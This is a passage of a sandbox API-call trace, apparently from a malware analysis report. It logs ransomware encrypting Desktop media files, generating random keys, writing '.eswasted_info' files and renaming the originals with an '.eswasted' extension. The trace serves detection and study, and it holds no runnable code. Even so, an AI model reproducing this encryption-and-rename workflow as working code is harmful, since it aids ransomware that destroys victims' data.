halpmcxz\\desktop\\2gh-sg0pgi\\x-galyszoehf.mp3.eswasted")) returned 1 [0072.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\X-GAlYSZoEhf.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\x-galyszoehf.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.088] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0072.089] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x492b [0072.089] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x492b) returned 0x2d0000 [0072.089] CloseHandle (hObject=0xfc) returned 1 [0072.091] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.091] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.091] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.091] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.092] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.092] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.100] SetEndOfFile (hFile=0x110) returned 1 [0072.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.102] CloseHandle (hObject=0x110) returned 1 [0072.105] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.105] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4edf40 | out: hHeap=0x4a0000) returned 1 [0072.105] _aulldvrm () returned 0x0 [0072.105] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.106] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.106] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\35Bin.flv") returned 51 [0072.106] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ebff0 [0072.106] lstrcpyW (in: lpString1=0x4ec056, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.106] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.106] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.107] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.107] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\35Bin.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\35bin.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.108] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.109] SetEndOfFile (hFile=0x110) returned 1 [0072.109] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.109] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.109] lstrcpyW (in: lpString1=0x4ec056, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\35Bin.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\35bin.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\35Bin.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\35bin.flv.eswasted")) returned 1 [0072.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\35Bin.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\35bin.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.111] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.111] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x158f8 [0072.111] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x158f8) returned 0xb10000 [0072.111] CloseHandle (hObject=0x100) returned 1 [0072.115] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.116] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.116] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.116] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.117] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.117] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.125] SetEndOfFile (hFile=0x110) returned 1 [0072.128] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.128] CloseHandle (hObject=0x110) returned 1 [0072.129] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.130] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8d38 | out: hHeap=0x4a0000) returned 1 [0072.130] _aulldvrm () returned 0x0 [0072.130] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.131] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.131] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5q5 ZjJEsk.png") returned 56 [0072.131] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4ebff0 [0072.131] lstrcpyW (in: lpString1=0x4ec060, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.131] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.131] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.132] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.132] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5q5 ZjJEsk.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5q5 zjjesk.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.133] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.134] SetEndOfFile (hFile=0x110) returned 1 [0072.135] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.135] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.135] lstrcpyW (in: lpString1=0x4ec060, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5q5 ZjJEsk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5q5 zjjesk.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5q5 ZjJEsk.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5q5 zjjesk.png.eswasted")) returned 1 [0072.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5q5 ZjJEsk.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5q5 zjjesk.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.136] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0072.136] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x12abf [0072.136] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12abf) returned 0xb10000 [0072.136] CloseHandle (hObject=0xfc) returned 1 [0072.140] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.141] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.141] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.141] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.141] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.141] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.190] SetEndOfFile (hFile=0x110) returned 1 [0072.193] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.193] CloseHandle (hObject=0x110) returned 1 [0072.195] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.195] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8df8 | out: hHeap=0x4a0000) returned 1 [0072.195] _aulldvrm () returned 0x0 [0072.195] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.196] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.196] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.196] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9VtYBi LXLHAb.m4a") returned 59 [0072.196] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4ebff0 [0072.196] lstrcpyW (in: lpString1=0x4ec066, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.196] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ed440 [0072.196] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.196] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ed440 | out: pbBuffer=0x4ed440) returned 1 [0072.197] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9VtYBi LXLHAb.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9vtybi lxlhab.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.197] WriteFile (in: hFile=0x110, lpBuffer=0x4ed440*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ed440*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.198] SetEndOfFile (hFile=0x110) returned 1 [0072.199] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.199] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.199] lstrcpyW (in: lpString1=0x4ec066, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9VtYBi LXLHAb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9vtybi lxlhab.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9VtYBi LXLHAb.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9vtybi lxlhab.m4a.eswasted")) returned 1 [0072.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9VtYBi LXLHAb.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9vtybi lxlhab.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.200] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.201] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x14dae [0072.201] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14dae) returned 0xb10000 [0072.201] CloseHandle (hObject=0xfc) returned 1 [0072.205] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.206] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.206] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.206] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.206] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.207] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.216] SetEndOfFile (hFile=0x110) returned 1 [0072.219] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.219] CloseHandle (hObject=0x110) returned 1 [0072.221] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.221] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee028 | out: hHeap=0x4a0000) returned 1 [0072.221] _aulldvrm () returned 0x0 [0072.221] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.222] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.222] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9z-jOysdYN.mp3") returned 56 [0072.222] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4ebff0 [0072.222] lstrcpyW (in: lpString1=0x4ec060, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.222] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ed440 [0072.222] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.223] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ed440 | out: pbBuffer=0x4ed440) returned 1 [0072.223] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9z-jOysdYN.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9z-joysdyn.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.225] WriteFile (in: hFile=0x110, lpBuffer=0x4ed440*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ed440*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.226] SetEndOfFile (hFile=0x110) returned 1 [0072.226] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.226] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.226] lstrcpyW (in: lpString1=0x4ec060, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9z-jOysdYN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9z-joysdyn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9z-jOysdYN.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9z-joysdyn.mp3.eswasted")) returned 1 [0072.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9z-jOysdYN.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9z-joysdyn.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.230] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.230] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x13a8b [0072.230] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a8b) returned 0xb10000 [0072.230] CloseHandle (hObject=0xf8) returned 1 [0072.234] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.235] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.235] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.235] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.236] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.236] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.244] SetEndOfFile (hFile=0x110) returned 1 [0072.247] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.247] CloseHandle (hObject=0x110) returned 1 [0072.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee0f8 | out: hHeap=0x4a0000) returned 1 [0072.248] _aulldvrm () returned 0x0 [0072.249] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.249] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.249] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ECs5H.m4a") returned 51 [0072.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ebff0 [0072.250] lstrcpyW (in: lpString1=0x4ec056, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ed440 [0072.250] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.250] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ed440 | out: pbBuffer=0x4ed440) returned 1 [0072.250] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ECs5H.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecs5h.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.252] WriteFile (in: hFile=0x110, lpBuffer=0x4ed440*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ed440*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.253] SetEndOfFile (hFile=0x110) returned 1 [0072.254] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.254] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.254] lstrcpyW (in: lpString1=0x4ec056, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ECs5H.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecs5h.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ECs5H.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecs5h.m4a.eswasted")) returned 1 [0072.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ECs5H.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecs5h.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.255] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.255] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x17ea8 [0072.255] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17ea8) returned 0xb10000 [0072.255] CloseHandle (hObject=0xfc) returned 1 [0072.260] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.260] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.260] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 